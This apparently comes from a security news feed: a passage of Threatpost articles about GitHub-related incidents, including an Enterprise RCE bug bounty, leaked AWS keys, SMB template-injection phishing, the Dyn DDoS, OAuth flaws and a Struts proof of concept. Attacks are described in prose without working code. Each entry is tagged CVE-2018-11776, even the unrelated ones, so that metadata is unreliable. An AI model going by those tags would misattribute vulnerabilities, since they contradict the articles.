to a researcher after he came across a bug in its GitHub Enterprise management console that could have resulted in remote code execution.\n\nThe company patched the vulnerability at the end of January, but news of the flaw didn\u2019t surface until this week when GitHub and Markus Fenske, a German independent pen-tester [disclosed it](<http://exablue.de/blog/2017-03-15-github-enterprise-remote-code-execution.html>).\n\nGitHub Enterprise is an on-premises version of GitHub.com that can be used to deploy a GitHub service on their organization\u2019s local network. The vulnerability is a combination of two bugs, Fenske told Threatpost Thursday.\n\nOne problem stems from the fact that a static value was being used to cryptographically sign the Ruby on Rails session secret for the console. The secret value is supposed to be a randomly generated per-machine value used to sign the cookie, not a static value.\n\nGitHub acknowledged on Tuesday that the static secret was only supposed to be used for testing and development, but \u201can unrelated change of file permissions prevented the intended (and randomly generated) session secret from being used.\u201d\n\n\u201cFor testing purposes they replaced it with a static value and forgot to change it back,\u201d Fenske told Threatpost. In the production environment, there was a mechanism that should have replaced it with a random value. But it did not work.\u201d\n\nWhile GitHub shouldn\u2019t have been using a static secret to sign cookies that hold session data, the other problem, Fenske says, is that session data could be serialized with Marshal. [Marshal](<https://ruby-doc.org/core-2.2.2/Marshal.html>), a library that converts collections of Ruby objects into a byte stream, has a method, .load, that can return the result of converted serialized data.\n\nAs Fenske points out, [documentation](<https://ruby-doc.org/core-2.2.0/Marshal.html#method-c-load>) around Marshal.load says to \u201cnever pass untrusted data (including user supplied input) to this method,\u201d but that\u2019s what GitHub was doing.\n\nBy knowing the secret, an attacker could have forged a cookie, deserialized by Marshal.load, and tricked GitHub into running whatever code they wanted.\n\n\u201cBecause the secret is known, you can create a valid signature and pass arbitrary data to Marshal.load, which then leads to remote code execution,\u201d Fenske said.\n\nFenske says that while he sells sugar wax for hair removal by day\u2013[seriously](<https://www.bodypil.de/ueber-uns.html>)\u2013he hacks stuff by night. He founded an IT security consulting firm, Exablue, last month which he plans to use to carry out audits, pen-testing, and \u201cthe whole range\u201d going forward. He said he was inspired to poke around GitHub Enterprise after he stumbled upon a blogpost by Taiwanese hacker Orange Tsai about [a SQL injection](<http://blog.orange.tw/2017/01/bug-bounty-github-enterprise-sql-injection.html>) he found in the platform.\n\n\u201cAbout two minutes after decoding the source and opening the first file (config.ru) of the first application (the management interface), I noticed the vulnerability,\u201d Fenske said.\n\nGitHub fixed the vulnerability on Jan. 31 when it pushed out GitHub Enterprise 2.8.7. Now the service defaults to a randomly generated session secret if the initially configured session secret is not found.\n\nIt was a fairly quick turnaround for the company; the patch came only five days after Fenske reported the issue and earned him $10,000, the highest reward the company gives out through its bug bounty program, and [a spot in its Hall of Fame](<https://bounty.github.com/researchers/iblue.html>).\n\n\u200b\u201dWorking with GitHub is really nice,\u201d Fenske said, \u201cFor a company that big, their speed is amazing.\u201d\n\nThe researcher had no idea when he submitted the bug, however, that the company was in the middle of a promotional bug bounty period. The company [announced the promotion](<https://github.com/blog/2302-bug-bounty-anniversary-promotion-bigger-bounties-in-january-and-february>), which stretched from January to February, to celebrate the third anniversary of its [bug bounty program](<https://bounty.github.com/#rules>) with HackerOne.\n\nAfter he sent a draft of his disclosure to the company this week, Fenske discovered his bug was severe enough to fetch an additional $8,000 bounty and [second place in the contest](<https://github.com/blog/2332-bug-bounty-third-anniversary-wrap-up>).\n\n\u201cI was just writing my article and sent GitHub a draft to look at, and the answer came within minutes, telling me that I can publish whatever I like and that they gave me more money,\u201dhe said, \u201cI did not know about that extra contest and was very pleasantly surprised.\u201d\n\nFenske\u2019s bug was one of three GitHub fixed in its Enterprise product to qualify for additional bug bounty money. The company also fixed two separate SAML authentication bypass bugs in the service.\n\nFenske said the latest release of GitHub Enterprise uses a secret that\u2019s 16 random bytes written in hex.\n\n\u201cI quickly calculated that cracking it will take about 469142742208 gigayears on a 8-GPU instance (for comparison: The Sun will be gone in 7.7 gigayears). I think it\u2019s secure now.\u201d\n", "cvss3": {}, "published": "2017-03-17T09:00:04", "type": "threatpost", "title": "GitHub Code Execution Bug Fetches $18,000 Bounty", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2017-03-16T23:38:35", "id": "THREATPOST:E984089A4842B564B374B807AF915A44", "href": "https://threatpost.com/github-code-execution-bug-fetches-18000-bounty/124378/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:59:06", "description": "Amazon Web Services is actively searching a number of sources, including code repositories and application stores, looking for exposed credentials that could put users\u2019 accounts and services at risk.\n\nA week ago, a security consultant in Australia said that as many as 10,000 secret Amazon Web Services keys could be found on Github through a simple search. And yesterday, a software developer reported receiving a notice from Amazon that his credentials were discovered on Google Play in an Android application he had built.\n\nRaj Bala printed a [copy of the notice](<http://blog.rajbala.com/post/81038397871/amazon-is-downloading-apps-from-google-play-and>) he received from Amazon pointing out that the app was not built in line with Amazon\u2019s recommended best practices because he had embedded his AWS Key ID (AKID) and AWS Secret Key in the app.\n\n\u201cThis exposure of your AWS credentials within a publicly available Android application could lead to unauthorized use of AWS services, associated excessive charges for your AWS account, and potentially unauthorized access to your data or the data of your application\u2019s users,\u201d Amazon told Baj.\n\nAmazon advises users who have inadvertently exposed their credentials to invalidate them and never distribute long-term AWS keys with an app. Instead, Amazon recommends requesting temporary security credentials.\n\nRich Mogull, founder of consultancy Securosis, said this is a big deal.\n\n\u201cAmazon is being proactive and scanning common sources of account credentials, and then notifying customers,\u201d Mogull said. \u201cThey don\u2019t have to do this, especially since it potentially reduces their income.\u201d\n\nMogull knows of what he speaks. Not long ago, he received a similar notice from Amazon regarding his AWS account, only his warning was a bit more dire\u2014his credentials had been exposed on Gitbub and someone had fired up unauthorized EC2 instances in his account.\n\nMogull wrote an [extensive description of the incident](<https://securosis.com/blog/my-500-cloud-security-screwup>) on the Securosis blog explaining how he was building a proof-of-concept for a conference presentation, storing it on Github, and was done in because a test file he was using against blocks of code contained his Access Key and Secret Key in a comment line.\n\nTurns out someone was using the additional 10 EC2 instances to do some Bitcoin mining and the incident cost Mogull $500 in accumulated charges.\n\nAmazon told an Australian publication that it will continue its efforts to seek out these exposed credentials on third-party sites such as Google Play and Github.\n\n\u201cTo help protect our customers, we operate continuous fraud monitoring processes and alert customers if we find unusual activity,\u201d _[iTnews](<http://www.itnews.com.au/News/381432,aws-admits-scanning-android-app-in-secret-key-hunt.aspx>) _quoted Amazon.\n\nSaid Mogull: \u201cIt isn\u2019t often we see a service provider protecting their customers from error by extending security beyond the provider\u2019s service itself. Very cool.\u201d\n", "cvss3": {}, "published": "2014-04-02T15:01:53", "type": "threatpost", "title": "Amazon Web Services Combing Third Parties for Credentials", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2014-04-04T19:14:11", "id": "THREATPOST:3DB647F38E79C8BDF5846F520D041C7C", "href": "https://threatpost.com/amazon-web-services-combing-third-parties-for-exposed-credentials/105217/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:53:25", "description": "Days after news broke last week that advanced, persistent threat actors penetrated nuclear facilities, researchers are explaining techniques used by adversaries to gain toeholds in similar targets in energy. Cisco Talos reported Friday that email-based attacks, leveraging template injection techniques, targeting nuclear facilities and others have been ongoing since May.\n\n\u201cTalos has observed attackers targeting critical infrastructure and energy companies around the world, primarily in Europe and the United States. These attacks target both the critical infrastructure providers, and the vendors those providers used to deliver critical services,\u201d [researchers wrote on Friday](<http://blog.talosintelligence.com/2017/07/template-injection.html#more>).\n\nAdversaries are leveraging classic Word document-based phishing attacks, they said. However, the Word document attachments used in the phishing campaigns do not contain malicious VBA macros or embedded scripting. Instead, attachments attempt to download a malicious template file over a Server Message Block (SMB) connection so that the user\u2019s credentials can be harvested, researchers said.\n\nCisco Talos did not claim this specific attack was used against Wolf Creek Nuclear Operating Corporation or in connection with any specific attack cited in a joint report issued by the Department of Homeland Security and the Federal Bureau of Investigation last week. Neither did researchers claim attacks had ever led to a hacker breaching or disrupting the core systems controlling operations at an energy plant.\n\n\u201cOne objective of this most recent attack appears to be to harvest credentials of users who work within critical infrastructure and manufacturing industries,\u201d Talos wrote.\n\nTargeted phishing attacks included DOCX type documents delivered as attachments under the guise of being an environmental report or a resume. While no malicious macros or scripting is embedded in the document, when a user opens it, a request is made via the SMB protocol for a template, as such \u201cContacting:\\\\\\ . . . \\Template.dotm.\u201d\n\n\u201cThe document was trying to pull down a template file from a particular IP,\u201d they noted. That connection was not via TCP 80 (often used for C2 communications), rather the SMB request was via TCP 445, a traditional Microsoft networking port.\n\nWithin the sandboxed VM \u201ca WebDAV connection was attempted over a SMB session when requesting the template.\u201d\n\nWebDAV is a Web-based Distributed Authoring and Versioning extension to the HTTP protocol that allows users to collaboratively edit and manage files on a remote server, according to [WebDAV Working Group](<http://www.webdav.org/>).\n\nUsing the WebDAV connection, the DOCX file requests a specific Relationship ID that is present in word/_rels/settings.xml.rels, or the XML instructions. According to researchers, the Relationship ID is identical to a phishing tool named Phishery, which uses the exact same ID in its template injection.\n\nPhishery is known as a credential harvester with a Word document template URL injector. According the [GitHub tool description](<https://github.com/ryhanson/phishery>), \u201cPhishery is a Simple SSL Enabled HTTP server with the primary purpose of phishing credentials via Basic Authentication.\u201d Once the target opens the Word document attachment sent in the phishing email, the template request reaches out to a Phishery server that triggers a dialogue box on the victim\u2019s computer requesting a Windows username and password.\n\nTalos researchers said Phishery was not used in the attacks it observed. It theorizes attacks may have used modified Phishery code or used the same Relationship ID to thwart analysis.\n\nIn the sample Talos examined, unlike with Phishery that prompted users for credentials, instead a template file is requested from a third-party server with no Basic Authentication prompt for credentials. \u201cSuch a prompt was not needed nor seen for samples requesting the template over SMB,\u201d they wrote.\n\nOnce the target opens the Word document a template request is made to a third-party server that initiates the download of a potentially rogue template. \u201cThe attachment instead tries to download a template file over an SMB connection so that the user\u2019s credentials can be silently harvested. In addition, this template file could also potentially be used to download other malicious payloads to the victim\u2019s computer,\u201d researchers said.\n\nTalos explains that the attacker\u2019s SMB server was down when it analyzed samples, making it impossible to determine the payloads (if any) that could have been dropped by the template being downloaded. \u201cForcing SMB requests to an external server has been a known security vulnerability for many years. Without further information it is impossible to conclude what the true scope of this attack was or what malicious payloads could have been involved.\u201d\n\nAccording to a _[New York Times](<https://www.nytimes.com/2017/07/06/technology/nuclear-plant-hack-report.html>)_ report of attacks against Wolf Creek Nuclear Operating Corporation included phishing lures with highly targeted email messages containing fake resumes for control engineering jobs.\n\nLate last month, the U.S. government warned critical infrastructure companies of hacking campaigns against nuclear and energy sector. \u201cHistorically, cyber actors have strategically targeted the energy sector with various goals ranging from cyber espionage to the ability to disrupt energy systems in the event of a hostile conflict,\u201d the report said.\n", "cvss3": {}, "published": "2017-07-10T14:34:03", "type": "threatpost", "title": "Energy, Nuclear Targeted with Template Injection Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2017-07-10T18:34:03", "id": "THREATPOST:6495B216452F8FF8CDF9A8F13AD41168", "href": "https://threatpost.com/energy-nuclear-targeted-with-template-injection-attacks/126727/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:54:34", "description": "**Update **DNS provider Dyn has confirmed two massive distributed denial of service attacks against its servers Friday impacting many of its customers including Twitter, Spotify and GitHub. The attacks came in two waves, one early Friday morning and a second just a few hours later.\n\n\u201cThis attack is mainly impacting U.S. East and is impacting Managed DNS customers in this region. Our engineers are continuing to work on mitigating this issue,\u201d according to a [statement by the company to customers](<https://www.dynstatus.com/>).\n\nAs of 5:30 p.m. EDT Dyn was still reporting it was investigating and mitigating several DDoS attacks against its domain name servers.\n\nIt\u2019s unclear how many sites have been impacted. For hours Friday morning many popular sites appeared to be experiencing outages or extremely sluggish performance including Twitter, Etsy, Github, SoundCloud, Spotify, Heroku, PagerDuty and Shopify. Dyn representatives would not confirm if each one of these outages was tied to the DDoS attack.\n\nBoth the Department of Homeland Security and the Federal Bureau of Investigation said they were monitoring the attacks. Gillian Christensen, acting deputy press secretary for DHS said in a statement: \u201cDHS and FBI are aware and are investigating all potential causes.\u201d\n\nManchester, New Hampshire-based Dyn said it first began monitoring the DDoS attack at 7:10 a.m. EDT Friday. The company said in a statement to customers:\n\n> \u201cStarting at 11:10 UTC on October 21th-Friday 2016 we began monitoring and mitigating a DDoS attack against our Dyn Managed DNS infrastructure. Some customers may experience increased DNS query latency and delayed zone propagation during this time. Updates will be posted as information becomes available.\u201d\n\nDyn said at 9:36 a.m. EDT, its services were restored and many of its affected customers, including Twitter, were back online. However, at 11:52 a.m. (EDT) Dyn updated its network status reporting an additional attack impacting its managed DNS infrastructure. Then 40 minutes later Dyn added the attacks had spread to its \u201cmanaged DNS advanced services with possible delays in monitoring.\u201d\n\nIt\u2019s unclear, at this time, the source of the DDoS attack, Dyn said.\n\nDale Drew, chief security officer for telecommunications firm Level 3 Communications said he had been monitoring the attack and the likely source were overseas hackers targeting U.S. cyber infrastructure. He added, [via a video statement posted to Periscope](<https://www.periscope.tv/w/1lPJqYjVMlZJb>), \u201cWe are seeing attacks coming from an Internet of Things botnet we have identified as Marai.\u201d\n\nSecurity firm Flashpoint also identified Marai as the likely culprit in the attack.\n\nThe Mirai malware continues to recruit vulnerable IoT devices into botnets [at a record pace](<https://threatpost.com/mirai-bots-more-than-double-since-source-code-release/121368/>), one that\u2019s only gone up since the source code for Mirai was made [public two weeks ago](<https://threatpost.com/source-code-released-for-mirai-ddos-malware/121039/>), according to Level 3.\n\nCraig Young, principle security researcher at Tripwire said the attack has telltale signs of an IoT-based DDoS attack similar to ones experienced by [Krebs on Security](<https://threatpost.com/iot-botnets-are-the-new-normal-of-ddos-attacks/121093/>) in September. In those attacks, hackers also used Mirai malware to compromise IoT devices to launch DDoS attacks.\n\n\u201cWe are seeing an increase in the number of high-intensity attacks that leverage compromised consumer DVRs and cameras. Without being able to analyze the source of Dyn\u2019s traffic it\u2019s impossible to know for sure. But what we are already seeing today, in terms IoT-based attacks, is the tip of the iceberg,\u201d Young said.\n\nRequests to Dyn for information on the source of the attacks have not been returned.\n\nYoung said that security experts have seen an increase in DDoS extortion attempts. However, he points out, many have been hoaxes and when companies didn\u2019t pay up nothing happened.\n\nForeScout CEO, Michael DeCesare said that attacks, such as the ones carried out Friday, are exasperated by the lack of security in IoT devices.\n\n\u201cThese attackers can now recruit an army of IoT devices to launch a wide scale DDoS attack due to the volume of these devices and their ease of infiltration,\u201d DeCesare said in a prepared statement regarding Friday\u2019s attacks.\n\n\u201cThe question corporations should be asking themselves is whether or not their devices are being exploited as part of these attacks. The solution starts with visibility \u2013 you cannot secure what you cannot see,\u201d he said.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/10/06232928/Threatpost_Level3_outage_map.jpg>)\n\nLevel3 live outage map on Friday 9:50 AM (EDT)\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/10/06232859/Screen-Shot-2016-10-21-at-5.18.29-PM.png>)\n\nLevel3 live outage map on Friday 5:20 PM (EDT)\n\n_This article was updated Oct. 21 at 5:30 p.m. with new information from the Department of Homeland Security, new information tying the attacks to Mirai malware and quotes from both Level 3 Communications and ForeScout. \n_\n", "cvss3": {}, "published": "2016-10-21T10:01:14", "type": "threatpost", "title": "DYN Confirms DDoS Attack Knocking Out Twitter, Spotify Other Major Sites", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2016-10-21T21:37:20", "id": "THREATPOST:0FC293825070B81036932BDB41D793B5", "href": "https://threatpost.com/dyn-confirms-ddos-attack-affecting-twitter-github-many-others/121438/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:55:10", "description": "Mike Mimoso and Chris Brook discuss the news of the week, including a password issue at Github, the xDedic marketplace, another Flash zero day, and how the poorly the FBI is doing with facial recognition software.\n\nDownload: [Threatpost_News_Wrap_June_17_2016.mp3](<http://traffic.libsyn.com/digitalunderground/Threatpost_News_Wrap_June_17_2016.mp3>)\n\nMusic by Chris Gonsalves\n\n[](<https://itunes.apple.com/us/podcast/digital-underground-podcast/id315355232?mt=2>)\n", "cvss3": {}, "published": "2016-06-17T11:15:12", "type": "threatpost", "title": "On xDedic, a Flash Zero Day, Facial Recognition, and More", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2016-06-28T13:58:31", "id": "THREATPOST:962241D6EFDC7F82640BA9171D82D0B7", "href": "https://threatpost.com/threatpost-news-wrap-june-17-2016/118745/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:55:11", "description": "Github is forcing a password reset on some of its users after it detected a number of successful intrusions into its repositories using credentials compromised in other breaches.\n\n\u201cThis appears to be the result of an attacker using lists of email addresses and passwords from other online services that have been compromised in the past, and trying them on GitHub accounts,\u201d GitHub said in an [advisory](<https://github.com/blog/2190-github-security-update-reused-password-attack>) published Thursday by Shawn Davenport, GitHub VP of security. \u201cWe immediately began investigating, and found that the attacker had been able to log in to a number of GitHub accounts.\u201d\n\nGitHub said it detected late Tuesday unauthorized attempts against a large number of GitHub accounts. It stressed that GitHub itself has not been compromised.\n\nIt warns users that in addition to the exposed credentials, some personal information may have been exposed as well as lists of accessible repositories and organizations.\n\n\u201cIf your account was impacted, we are in the process of contacting you directly with information about how to reset your password and restore access to your account,\u201d GitHub said.\n\nThe source of credentials used to attack GitHub accounts is unknown. ~~A request for comment from GitHub was not returned in time for publication~~ Github declined to comment beyond what is in its advisory.\n\nIn recent weeks, a number of massive online services including Twitter, VerticalScope, LinkedIn, Tumblr, VK.com and others have been informed that login credentials are for sale in bulk on the black market.\n\nAggregator site LeakedSource has been selling access to its database of breached credentials and more than 700 million credentials have been shared with the site.\n\n\u201cOur intentions are to bring data breaches to light no matter how old, inform consumers about what data is out there, inform consumers to use unique passwords and through our business API directly help companies determine if their users are at risk for account hijacking,\u201d LeakedSource told Threatpost.\n\n[VerticalScope](<http://www.verticalscope.com/about-us/security-update.html>), whose technology powers a number of popular online forums, is the most recent victim to come to light. More than 40 million credentials are believe to be implicated, stolen from sites running outdate vBulletin software that fails to implement HTTPS.\n\n\u201cWe believe that any potential breach is limited to usernames, userids, email addresses, ip addresses and encrypted passwords of our community users,\u201d VerticalScope said in its advisory.\n\nThe VerticalScope data was shared with LeakedSource, which analyzed it and said most of the passwords were salted using the outdated MD5 algorithm and easily crackable. LeakedSource published a top 10 list of the most common passwords and an unusual number of jibberish, complex passwords were included (18atcskd2w was used more on more than 91,000 accounts) indicating that they were likely generated by a bot and used to access the various forums.\n\nIn addition to VerticalScope, LeakedSource has analyzed tens of millions of credentials belonging to Twitter, iMesh and users of other large services whose credentials were stolen at some point.\n\nExperts, meanwhile, continue to caution against [password reuse](<https://threatpost.com/no-simple-fix-for-password-reuse/118536/>). As these breaches show, using the same password to access multiple sites is becoming fodder for attackers compromising one site to use that same access at other locations on the Internet.\n\n\u201cWe know that attackers will go for the weakest link and that is any user who reuses their passwords. It\u2019s a major problem,\u201d said Christopher Hadnagy, chief human hacker at security firm Social-Engineer.\n", "cvss3": {}, "published": "2016-06-17T11:01:55", "type": "threatpost", "title": "Breached Credentials Used to Access Github Repositories", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2016-06-28T13:58:36", "id": "THREATPOST:375A1BFC29F5B279C4D5E461D79CE4AA", "href": "https://threatpost.com/breached-credentials-used-to-access-github-repositories/118746/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:59:23", "description": "A Russian security researcher was able to take five low severity OAuth bugs in the coding site Github and string them together to create what he calls a \u201csimple but high severity exploit\u201d that gave him unfettered access to users\u2019 private repositories.\n\nBangkok-based researcher Egor Homakov \u2013 inspired to poke around the site after learning about its [new bug bounty program last month](<http://threatpost.com/github-launches-bug-bounty-program/103974>) \u2013 discussed the bugs in a blog entry [on his site](<http://homakov.blogspot.com/2014/02/how-i-hacked-github-again.html?m=1>) on Friday.\n\nGithub went on to fix the vulnerabilities \u201cin a timely fashion\u201d according to Homakov, who said he received a $4,000 reward, the highest Github has rewarded in the bounty program\u2019s short time, for his work.\n\nThe main problem lies in the site\u2019s Gist OAuth functionality. [Gists](<https://gist.github.com/>) are Pastebin-like repositories on Github that allow coders to share bits and pieces of their work with their contemporaries, and OAuth is an authentication protocol that can allow different entities, be it a web app or a mobile app, varying degrees of access to your account.\n\nThe first vulnerability in Github Homakov noticed was that he could bypass its [redirect_uri](<https://developer.github.com/v3/oauth/#redirect-urls>) validation by imputing a /../ path traversal. A path traversal attack allows access files and directories stored outside the web root folder to be accessed by manipulating the URL. In this case when the browser is redirected, Homakov found that he can control the HTTP parameter and trick it into not fully parsing the URL, letting him redirect to any Gist page he wants.\n\nIn fact Homakov found that whatever the client sent to get an authorization token, the provider would respond with a valid access_token, a vulnerability that could be used to compromise the log-in functionality on any site that uses it.\n\nThis \u2013 the second bug \u2013 could make it easy for an attacker to hijack the authorization code used for the redirect_uri and simply apply the leaked code on real client\u2019s callback to log in under the victim\u2019s account.\n\nHomakov discovered he could leverage both bugs to trick a user into following a link to get Github to leak a code sending request to him. Using something he\u2019s nicknamed an [Evolution of Open Redirect vulnerability](<http://homakov.blogspot.com/2014/01/evolution-of-open-redirect-vulnerability.html>) the code sending request is sent to an image request which Homakov can then use to then log into the victim\u2019s account and secure access to private gists.\n\nGists are static pages and can even allow users to embed their own images, or at least image code. In this situation there\u2019s a certain way the code can point to a suspicious URL and acquire the victim\u2019s code.\n\nOnce in, Homakov found that the client reveals the victim\u2019s actual OAuth access_token to the user agent, something he then was able to take advantage of and use to perform API calls on behalf of the victim.\n\nSince Gist falls under the Github umbrella, Homakov found the client approves any scope it\u2019s asked automatically. That includes allowing it to carry out specially crafted URLs that can leak code, giving him access to private GitHub repositories and Gists, \u201call in stealth-mode,\u201d because the github_token belongs to the Gist client. From here Homakov has the control of the affected Github user and their Gist account.\n\nHomakov is no stranger to rooting out Github bugs; he blogged about a bug involving the way the site pushes [public keys](<http://homakov.blogspot.com/2012/03/how-to.html>) in March 2012 and a problem with the way the site [handles cookies](<http://homakov.blogspot.com/2013/03/hacking-github-with-webkit.html>) last March.\n\nGithub kicked off its bug bounty program just over a week ago by promising to award anywhere from $100 to $5,000 to researchers who discover vulnerabilities in the site or other applications like its API or Gist. As Homakov\u2019s vulnerability involved both Github and Gist and fetched $4,000, it was clearly of concern to the site, with the way the vulnerabilities \u201c[fit so nicely together](<https://twitter.com/homakov/status/431685133570031617>),\u201d impressing Github.\n", "cvss3": {}, "published": "2014-02-11T10:53:58", "type": "threatpost", "title": "Five OAuth Bugs Lead to Github Hack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2014-02-13T22:01:16", "id": "THREATPOST:1F0994F898084346360FB7C6EFEC201C", "href": "https://threatpost.com/five-oauth-bugs-lead-to-github-hack/104178/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-05-30T05:51:35", "description": "Proof-of-concept code found on the GitHub repository could allow attackers to easily take advantage of a recently identified vulnerability in the Apache Struts 2 framework. The vulnerability ([CVE-2018-11776](<https://access.redhat.com/security/cve/cve-2018-11776>)), [identified earlier this week](<https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/>), could allow an adversary to execute remote code on targeted systems.\n\nOn Friday, proof-of-concept code was [released](<https://github.com/jas502n/St2-057>) on GitHub along with a [Python script](<https://github.com/pr4jwal/quick-scripts/blob/master/s2-057.py>) that allows for easy exploitation, according to Allan Liska, senior security architect with Recorded Future.\n\n\u201c[We have] also detected chatter in a number of Chinese and Russian underground forums around the exploitation of this vulnerability,\u201d he [wrote in a post](<https://www.recordedfuture.com/apache-struts-vulnerability-github/>).\n\nThe bug, which impacts Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16, is tied to an improper validation of input data. The Apache Software Foundation [patched](<https://cwiki.apache.org/confluence/display/WW/S2-057>) the vulnerability for all supported versions of Struts 2. Users of Struts 2.3 are advised to upgrade to 2.3.35 and users of Struts 2.5 need to upgrade to 2.5.17.\n\nLiska said the Apache Struts 2 vulnerability is potentially even more damaging than a similar [2017 Apache Struts bug used to exploit Equifax](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>).\n\n\u201cUnlike that vulnerability, this one does not require any plug-ins to be present in order to exploit it, a simple well-crafted URL is enough to give an attacker access to a victim\u2019s Apache Struts installation and there is already exploit code on Github and underground forums are talking about how to exploit it. The worst part for many large organizations is that they may not even know they are vulnerable because Struts underpins a number of different systems including Oracle and Palo Alto,\u201d Liska said.\n\nThe fact that a patch is available to fix the vulnerability should give cold comfort to companies potentially impacted by the flaw.\n\n\u201cThe Equifax breach happened not because the vulnerability wasn\u2019t fixed, but because Equifax hadn\u2019t yet updated Struts to the latest version. If this is a true working PoC, then any company who hasn\u2019t had the time to update their software, will now be at even greater risk,\u201d said Oege de Moor, chief executive officer at Semmle.\n\nDe Moor said Semmle is not confirming whether the reported PoC is functional.\n\n\u201cIf it is [functioning], attackers now have a quicker way into the enterprise,\u201d de Moor wrote in a prepared statement Friday. \u201cThere is always a time lag between the announcement of a patch and a company updating its software. There are many reasons why companies can\u2019t update software like Struts immediately, as it is used for many business-critical operations. We aim to give companies a chance to stay safe by working with Apache Struts to make a coordinated disclosure.\u201d\n", "cvss3": {}, "published": "2018-08-24T22:07:17", "type": "threatpost", "title": "PoC Code Surfaces to Exploit Apache Struts 2 Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-24T22:07:17", "id": "THREATPOST:2F30C320035805DB537579B86877517E", "href": "https://threatpost.com/poc-code-surfaces-to-exploit-apache-struts-2-vulnerability/136921/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:56:47", "description": "An audit of the SSH keys associated with more than a million GitHub accounts shows that some users have weak, easily factorable keys and many more are using keys that are still vulnerable to the Debian OpenSSL bug disclosed seven years ago.\n\nThe public SSH keys that users associate with their GitHub account are visible to other users, a feature that enables users to share those keys with others. Last December researcher Ben Cox decided to collect as many of those keys as he could and see what he could find out about them. He began the project on Dec. 27 and by Jan. 9 he had collected more than 1.3 million SSH keys.\n\n\u201cI took a stab at this in 2013 but found that too many people didn\u2019t use GitHub in SSH mode and thus had no keys set. This time however (with a new program that used the events api) I found that the majority of active users had some SSH keys in there,\u201d Cox said in a blog [post](<https://blog.benjojo.co.uk/post/auditing-github-users-keys>) detailing the project.\n\nAfter collecting the keys, Cox began analyzing them. One of the things he looked at was the strength of the key, and he discovered that seven of the keys in his set were just 512 bits, and two others were 256 bits. Those key lengths are short enough to be in the range of factorization on many modern machines.\n\n\u201c512 bit keys have been known to be factorable in less than 3 days. The main example of this is the Texas Instruments calculator firmware signing key that was broken, allowing the modding community to upload any firmware that they wanted,\u201d Cox said.\n\n\u201cI tried on my own to make a 256 bit key and factor it, and the process took less than 25 minutes from having the public SSH key to the factoring of primes (on a subpar processer by today\u2019s standards, and then a few more minutes to transform those back into a SSH key that I could log into systems with. This risk isn\u2019t only real if someone had gathered together top of the line mathematicians or supercomputers worth of power, the 256 bit key I factored was factored on a i5-2400 in 25 mins.\u201d\n\nThe bigger issue, however, is that Cox found what he calls a \u201cvery large amount\u201d of SSH keys in the set that were vulnerable to the [Debian OpenSSL bug](<https://lists.debian.org/debian-security-announce/2008/msg00152.html>) from 2008. That vulnerability existed in certain versions of Debian and resulted from the fact that the OpenSSL random number generator included in those versions was predictable. That means that cryptographic keys generated with vulnerable versions could be guessable. The bug affected SSH keys, VPN keys, and DNSSEC keys, among others.\n\nCox compared the list of keys he had gleaned from GitHub to a list of keys affected by the Debian flaw and found that some of the accounts using vulnerable keys had access to some large and sensitive GitHub repositories. Some of those repositories include Yandex, the Russian search provider, Spotify, the cryptographic libraries for Python, and Python\u2019s core.\n\nCox disclosed the problem to GitHub in early March and the vulnerable keys were revoked on May 5. The other weak and low-quality keys he discovered were revoked on June 1.\n", "cvss3": {}, "published": "2015-06-03T07:37:04", "type": "threatpost", "title": "Audit of GitHub SSH Keys Finds Many Still Vulnerable to Old Debian Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2015-06-04T15:34:07", "id": "THREATPOST:9F1389C4D97BAD7FDE2519A42E4594E2", "href": "https://threatpost.com/audit-of-github-ssh-keys-finds-many-still-vulnerable-to-old-debian-bug/113117/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:57:28", "description": "The U.S. Army has released to open source an internal forensics analysis framework that the Army Research Lab has been using for some time.\n\nThe framework, known as Dshell, is a Python tool that runs on Linux and its designed to help analysts investigate compromises within their environments. The goal in open sourcing the framework is to encourage outside developers and analysts to develop and contribute their own modules, based on their experiences.\n\n\u201cOutside of government there are a wide variety of cyber threats that are similar to what we face here at ARL,\u201d William Glodek, Network Security branch chief at the Army Research Laboratory, said in a [statement](<http://www.army.mil/article/141734>).\n\n\u201cDshell can help facilitate the transition of knowledge and understanding to our partners in academia and industry who face the same problems.\u201d\n\nThe Dshell framework is available on [GitHub](<https://github.com/USArmyResearchLab/Dshell>), and Glodek said in his statement that he hopes that users in private industry and the academic community will find the framework useful and be able to contribute their own modules and help expand the framework\u2019s functionality.\n\n\u201cThe success of Dshell so far has been dependent on a limited group of motivated individuals within government. By next year it should be representative of a much larger group with much more diverse backgrounds to analyze cyber attacks that are common to us all,\u201d Glodek said.\n\nThe release of Dshell comes shortly after [Cisco released its own OpenSOC security analytics framework](<https://threatpost.com/cisco-releases-security-analytics-framework-to-open-source/109415>) on [GitHub](<https://opensoc.github.io/>) in November. That framework is designed specifically for large network environments and provides some anomaly detection 